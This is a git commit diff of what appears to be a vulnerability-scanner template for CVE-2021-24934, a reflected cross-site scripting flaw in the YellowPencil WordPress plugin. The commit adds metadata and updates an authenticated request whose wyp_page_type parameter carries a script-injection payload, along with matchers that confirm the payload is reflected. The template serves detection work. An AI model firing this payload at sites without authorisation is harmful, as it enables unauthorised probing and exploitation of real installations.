added metadata

patch-14
Dhiyaneshwaran 2024-11-11 09:39:58 +05:30 committed by GitHub
parent 33fca8e0c3
commit cf06157020
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 11 additions and 5 deletions

View File

@ -14,10 +14,16 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-24934
cwe-id: CWE-79
epss-score: 0.00076
epss-percentile: 0.33981
cpe: cpe:2.3:a:yellowpencil:visual_css_style_editor:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
tags: cve2021,cve,wordpress,wp-plugin,xss,wpscan
max-request: 2
vendor: yellowpencil
product: visual_css_style_editor
framework: wordpress
publicwww-query: "/wp-content/plugins/yellow-pencil-visual-theme-customizer"
tags: cve,cve2021,wordpress,wpscan,wp-plugin,yellowpencil,xss,authenticated
http:
- raw:
@ -27,8 +33,9 @@ http:
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=yellow-pencil-editor&href=1&wyp_page_id=home&wyp_page_type=home&wyp_mode=single&wyp_page_type=<script>alert(1)</script> HTTP/1.1
GET /wp-admin/admin.php?page=yellow-pencil-editor&href=1&wyp_page_id=home&wyp_page_type=home&wyp_mode=single&wyp_page_type=<script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
matchers:
@ -36,6 +43,5 @@ http:
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "<script>alert(1)</script>")'
- 'contains(body_2, "yellow-pencil-iframe-data")'
- 'contains_all(body_2, "<script>alert(document.domain)</script>", "yellow-pencil-iframe-data")'
condition: and